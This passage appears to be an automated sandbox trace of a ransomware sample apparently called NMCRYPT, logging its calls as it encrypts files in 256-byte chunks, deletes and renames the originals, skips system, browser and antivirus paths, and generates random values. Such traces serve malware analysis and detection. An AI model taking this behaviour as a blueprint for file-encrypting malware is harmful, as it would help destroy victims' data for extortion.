lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.192] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.192] GetLastError () returned 0x0 [0168.192] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.192] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.193] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.193] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x110) returned 1 [0168.193] GetLastError () returned 0x0 [0168.193] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x110, lpOverlapped=0x0) returned 1 [0168.194] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0168.194] WriteFile (in: hFile=0x15c4, lpBuffer=0x2882928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0168.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb")) returned 0x20 [0168.194] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb", dwFileAttributes=0x20) returned 0 [0168.194] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned 1 [0168.194] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb")) returned 0 [0168.195] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb") returned="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" [0168.195] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\System\\ado") returned 1 [0168.195] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX49C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx49c.tmp")) returned 0x49c [0168.196] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\msador28.tlb" (normalized: "c:\\program files\\common files\\system\\ado\\msador28.tlb"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX49C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx49c.tmp"), dwFlags=0x1) returned 0 [0168.196] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\ado\\.xX49C.tmp" (normalized: "c:\\program files\\common files\\system\\ado\\.xx49c.tmp")) returned 1 [0168.197] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0168.197] wcslen (_String="OK") returned 0x2 [0168.197] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.197] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0168.197] CryptDestroyKey (hKey=0x9ad378) returned 1 [0168.197] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0168.197] CryptReleaseContext (hProv=0x8e3aa0, dwFlags=0x0) returned 1 [0168.197] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.197] PathMatchSpecW (pszFile="msadox.dll", pszSpec="*NMCRYPT") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox.dll", pszSpec="*Recovers your files.html") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox.dll", pszSpec="*.exe") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox.dll", pszSpec="*.dll") returned 1 [0168.197] FindNextFileW (in: hFindFile=0x9ad478, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*NMCRYPT") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*Recovers your files.html") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.exe") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.dll") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.lnk") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.bat") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.ini") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.msi") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*.scf") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*pagefile.sys*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*NTUSER.DAT*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*AppData*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\winrar\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\Internet Explorer\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\java\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\TeamViewer\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\windows\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\ESET\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\AVG\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\AVIRA\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*\\AVAST Software\\*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*Atheros*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*Realtek*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*bootmgr*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*boot*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*boot*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*CONFIG.SYS*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*IO.SYS*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*MSDOS.SYS*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*NTDETECT.COM*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*ntldr*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*chrome*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*opera*") returned 0 [0168.197] PathMatchSpecW (pszFile="msadox28.tlb", pszSpec="*firefox*") returned 0 [0168.198] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\System\\ado\\msadox28.tlb", pszSpec="*") returned 1 [0168.198] strlen (_Str="NMoreira") returned 0x8 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.198] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0168.199] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 